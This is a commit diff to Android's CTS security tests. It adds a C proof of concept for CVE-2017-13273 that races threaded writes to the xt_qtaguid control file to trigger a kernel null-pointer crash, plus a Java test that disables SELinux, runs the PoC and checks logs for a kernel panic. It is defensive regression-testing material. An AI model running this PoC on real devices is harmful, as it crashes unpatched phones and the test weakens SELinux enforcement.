CTS test for Android Security b/65853158 b/72396737
Test: successful run of newly introduced CTS test case.
Bug: 65853158
Bug: 72396737
Change-Id: Ic6da1bfe405d8a4e3f2e89364b354e376aa5bd5a
Signed-off-by: JSinha <jimmi.sinha@harman.corp-partner.google.com>
(cherry picked from commit a7e3f29dd12724d2f7f3215db1c5fb28016a7794)
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index f881e64..9a54760 100755
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -146,6 +146,7 @@
<!--__________________-->
<!-- Bulletin 2018-02 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2017-13273->/data/local/tmp/CVE-2017-13273" />
<option name="push" value="CVE-2017-13232->/data/local/tmp/CVE-2017-13232" />
<!--__________________-->
diff --git a/hostsidetests/security/securityPatch/CVE-2017-13273/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-13273/Android.mk
new file mode 100644
index 0000000..1cb7357
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-13273/Android.mk
@@ -0,0 +1,31 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-13273
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-13273/poc.c b/hostsidetests/security/securityPatch/CVE-2017-13273/poc.c
new file mode 100644
index 0000000..0856392
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-13273/poc.c
@@ -0,0 +1,136 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+#define MAX_THREAD 6
+
+int ctrl_fd;
+static int cmd;
+static int status[MAX_THREAD];
+static int sock_fd;
+
+void *thread_entry(void *arg) {
+ int index, len = 256, ret;
+ char buf[256];
+ index = (int)(unsigned long)arg;
+ memset(buf, 0x0, 256);
+ status[index] = 1;
+
+ // cmd =-1 signifies error in thread creation
+ while (cmd != 1 && cmd != -1) {
+ usleep(5);
+ }
+
+ if (cmd != -1) {
+ switch (index % 3) {
+ case 0:
+ len = sprintf(buf, "d %lu", (unsigned long)0);
+ break;
+ case 2:
+ len = sprintf(buf, "t %d", sock_fd);
+ break;
+ }
+
+ ret = write(ctrl_fd, buf, len);
+ }
+
+ status[index] = 2;
+ return NULL;
+}
+/*
+ *This PoC creates multiple threads to write /proc/net/xt_qtaguid/ctrl device
+ *which causes null pointer derefrences in netstat.
+ */
+int main() {
+ int fd, retry = 1024;
+ int ret, i, loop;
+ pthread_t tid[MAX_THREAD];
+
+ fork();
+ sock_fd = socket(AF_INET, SOCK_STREAM, 0);
+ while (retry--) {
+ cmd = 0;
+ for (i = 0; i < MAX_THREAD; i++) {
+ status[i] = 0;
+ }
+
+ fd = open("/dev/xt_qtaguid", O_RDONLY);
+ if (fd < 0) {
+ return -1;
+ }
+
+ ctrl_fd = open("/proc/net/xt_qtaguid/ctrl", O_RDWR);
+ if (ctrl_fd < 0) {
+ return -1;
+ }
+
+ for (i = 0; i < MAX_THREAD; i++) {
+ ret =
+ pthread_create(&tid[i], NULL, thread_entry, (void *)(unsigned long)i);
+ if (ret != 0) {
+ cmd = -1;
+ close(ctrl_fd);
+ }
+ }
+
+ loop = 1;
+ int count = 0;
+ // loop until all threads have status == 1
+ while (loop) {
+ loop = 0;
+ count = count + 1;
+ for (i = 0; i < MAX_THREAD; i++)
+ if (status[i] != 1) {
+ loop = 1;
+ break;
+ }
+
+ if (loop) {
+ usleep(5);
+ }
+ }
+
+ cmd = 1;
+ loop = 1;
+ while (loop) {
+ loop = 0;
+ count = count + 1;
+ for (i = 0; i < MAX_THREAD; i++)
+ if (status[i] != 2) {
+ loop = 1;
+ break;
+ }
+
+ if (loop) {
+ usleep(5);
+ }
+ }
+ close(fd);
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc18_02.java b/hostsidetests/security/src/android/security/cts/Poc18_02.java
index 1d6c60d..a0fd9c1 100644
--- a/hostsidetests/security/src/android/security/cts/Poc18_02.java
+++ b/hostsidetests/security/src/android/security/cts/Poc18_02.java
@@ -33,4 +33,23 @@
"invalid attributes: usage=.{1,} content=.{1,} "+
"flags=.{1,} tags=\\[.{256,}\\].*", logcatOutput);
}
+
+ /**
+ * b/65853158
+ */
+ @SecurityTest
+ public void testPocCVE_2017_13273() throws Exception {
+ AdbUtils.runCommandLine("dmesg -c" ,getDevice());
+ AdbUtils.runCommandLine("setenforce 0",getDevice());
+ if(containsDriver(getDevice(), "/dev/xt_qtaguid") &&
+ containsDriver(getDevice(), "/proc/net/xt_qtaguid/ctrl")) {
+ AdbUtils.runPoc("CVE-2017-13273", getDevice(), 60);
+ String dmesgOut = AdbUtils.runCommandLine("cat /sys/fs/pstore/console-ramoops",
+ getDevice());
+ assertNotMatches("[\\s\\n\\S]*CVE-2017-132736 Tainted:" + "[\\s\\n\\S]*" +
+ "Kernel panic - not syncing: Fatal exception in interrupt", dmesgOut);
+ }
+ AdbUtils.runCommandLine("setenforce 1",getDevice());
+ }
}
+